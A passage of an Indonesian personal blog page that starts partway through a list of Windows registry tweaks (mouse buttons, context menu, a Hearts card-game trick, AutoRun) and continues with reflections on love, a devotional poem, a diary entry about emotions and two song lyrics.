Klik ganda NoClose dan beri angka 1 pada Value Data.

(19). Mengubah Tombol Kiri Menjadi Tombol Kanan Pada Mouse
HKEY_CURRENT_USER/Control Panel/Mouse
Klik ganda pada SwapMouseButtons dan beri angka 1 pada Value Data.

(20). Menonaktifkan Klik-kanan Pada Desktop
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Buat sebuah DWORD Value baru dan beri nama NoViewContextMenu.
Klik ganda pada NoViewContextMenu dan masukkan angka 1 pada Value Data.

(21). Kode Curang Bermain Game Hearts
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Applets
Klik menu Edit > New > Key dan beri nama Hearts.
Klik menu Edit > New > String Value dan beri nama ZB dan isikan angka 42 pada Value Data.
Buka game Hearts pada Start Menu > All Programs > Games. Setelah memasukkan nama pemain,
tekan kombinasi tombol berikut : Ctrl+Shift+Alt+F12 dan semua kartu akan terbuka.

(22). Mengganti AM Dan PM Menjadi Pagi Dan Sore
HKEY_CURRENT_USER/Control Panel/International
Klik ganda s1159 dan ubah teks AM dengan PAGI.
klik ganda s2359 dan ubah teks PM dengan SORE.

(23). Menonaktifkan Fungsi AutoRun
HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer
Klik ganda NoDriveTypeAutoRun dan masukkan angka 95 pada Value Data.

kenapa kita menutup mata ketika kita tidur?
ketika kita menangis?
ketika kita membayangkan?
itu karena hal terindah di dunia tdk terlihat

ketika kita menemukan seseorang yang
keunikannya sejalan dengan kita, kita bergabung
dengannya dan jatuh ke dalam suatu keanehan
serupa yang dinamakan cinta.

Ada hal2 yang tidak ingin kita lepaskan,
seseorang yang tidak ingin kita tinggalkan,
tapi melepaskan bukan akhir dari dunia,
melainkan suatu awal kehidupan baru,
kebahagiaan ada untuk mereka yang tersakiti,
mereka yang telah dan tengah mencari dan
mereka yang telah mencoba.
karena merekalah yang bisa menghargai betapa
pentingnya orang yang telah menyentuh kehidupan
mereka.

Cinta yang sebenarnya adalah ketika kamu
menitikan air mata dan masih peduli terhadapnya,
adalah ketika dia tidak memperdulikanmu dan
kamu masih menunggunya dengan setia.

Adalah ketika di mulai mencintai orang lain dan
kamu masih bisa tersenyum dan berkata
” aku turut berbahagia untukmu ”

Apabila cinta tidak bertemu bebaskan dirimu,
biarkan hatimu kembalike alam bebas lagi.
kau mungkin menyadari, bahwa kamu menemukan
cinta dan kehilangannya, tapi ketika cinta itu mati
kamu tidak perlu mati bersama cinta itu.

Orang yang bahagia bukanlah mereka yang selalu
mendapatkan keinginannya, melainkan mereka
yang tetap bangkit ketika mereka jatuh, entah
bagaimana dalam perjalanan kehidupan.
kamu belajar lebih banyak tentang dirimu sendiri
dan menyadari bahwa penyesalan tidak
seharusnya ada, cintamu akan tetap di hatinya
sebagai penghargaan abadi atas pilihan2 hidup
yang telah kau buat.

Teman sejati, mengerti ketika kamu berkata ” aku
lupa ….”
menunggu selamanya ketika kamu berkata ”
tunggu sebentar ”
tetap tinggal ketika kamu berkata ” tinggalkan aku
sendiri ”
mebuka pintu meski kamu belum mengetuk dan
belum berkata ” bolehkah saya masuk ? ”
mencintai juga bukanlah bagaimana kamu
melupakan dia bila ia berbuat kesalahan,
melainkan bagaimana kamu memaafkan.

Bukanlah bagaimana kamu mendengarkan,
melainkan bagaimana kamu mengerti.
bukanlah apa yang kamu lihat, melainkan apa
yang kamu rasa,
bukanlah bagaimana kamu melepaskan melainkan
bagaimana kamu bertahan.

Mungkin akan tiba saatnya di mana kamu harus
berhenti mencintai seseorang, bukan karena orang
itu berhenti mencintai kita melainkan karena kita
menyadari bahwa orang iu akan lebih berbahagia
apabila kita melepaskannya.

kadangkala, orang yang paling mencintaimu adalah
orang yang tak pernah menyatakan cinta
kepadamu, karena takut kau berpaling dan
memberi jarak, dan bila suatu saat pergi, kau akan
menyadari bahwa dia adalah cinta yang tak kau
sadari

Doa

kepada pemeluk teguh

Tuhanku
Dalam termangu
Aku masih menyebut namamu

Biar susah sungguh
mengingat Kau penuh seluruh

cayaMu panas suci
tinggal kerdip lilin di kelam sunyi

Tuhanku

aku hilang bentuk
remuk

Tuhanku

aku mengembara di negeri asing

Tuhanku
di pintuMu aku mengetuk
aku tidak bisa berpaling

emotion

hmmm,,,

ternyata idup tu emg indah yaa, :-D

tinggal gimana cara kita idup aj, hehee..

bukan'e sok-sok nasehatin yaah...

tp bener kq, kaya kita maen game gtu,,

susah, seneng, bahagia, marah, dll,

itu hanya perasaan aja,

selama kita bisa kuasain tu semua aja, :)

coz everything’s gonna be OKAY

kaya hari ne,

perasaanku hari ini netral benget,

nggk seneng, nggk susah, nggk lgi sedih

ato marah,

yah pokoknya netral aj dc, :)

padahal hari ini aq memdapatkan bnyak hal

yang memicu emosi2 tersebut,

entah itu kabar tentang mantan cew'q yang

lgi mesra2'nya ma cow'e,

entah itu tentang kerjaan,

yahh pokok'nya banyak dc,,,,

semua kan uda ada yang ngatur,

kita manusia tinggal jalanin aj.

bener kan??

yah tapi tetep ada usaha dan doa lah...

:-D

ato kaya kita lgi chat,

klo kita buat emotion senyum,..

mau di lihat siapa aj ato kpan aj,

orang tau'nya kita lgi seneng,, :)

hehee iya kan???

yahh segitu dc dari aq,

ntr kpan2 jumpa lgi dc,...

benernya aq cma asal tulis aja sh...

entah itu bener apa salah yah silahkan,..

heheheee,.......

:-)

Jalan Terbaik

Semua telah berakhir
Tak mungkin bisa dipertahankan
Hanya luka jika kita bersama
Karma jalan ini memang berbeda
*Semua yang terjadi
tak akan kembali
jalan kita memang berbeda
Namun hati ini tak ingin kembali

Ku yakin kita akan bahagia
Tanpa harus selalu bersama
Tak perlu di sesali
Tak usah di tangisi
Ku yakin ini jalan terbaik
Walau kita tak lagi berdua
Tak perlu di sesali
Tak usah di tangisi

Terang Dalam Gelapku

Kita yang pernah merasakan
Hitam terangnya cinta
Bersamamu kan kujelang hari bahagia
Tanpamu ku gelap . . Tanpamu gelap
Simpan saja semua cerita
Tentang hitamnya cinta
Bersamamu kan kujelang hari bahagia
Tanpamu ku gelap . . Engkaulah terang

Dan aku . .
T’lah yakinkan hatiku bahagiakan
Kujelang bersamamu
Dan aku . .
Yang tak bisa tanpamu karna
Engkaulah terang dalam gelapku
Bulan bintang yang s’lalu datang
Setia terangi malam
Tak seterang hatimu, tak seterang cinta
Yang kau berikan . . yang kau berikan

Aku di sini tanpamu
Mengharapkan cintamu
Dalam gelap langkahku
Dan aku . .
T’lah yakinkan hatiku bahagiakan
Kujelang bersamamu

Contact Form

Name *

Email *

Subject *

Message *

<br />

Text

Image Verification Please enter the text from the image: [Refresh Image] [What's This?]

Powered byEMF Online Form Builder

Report Abuse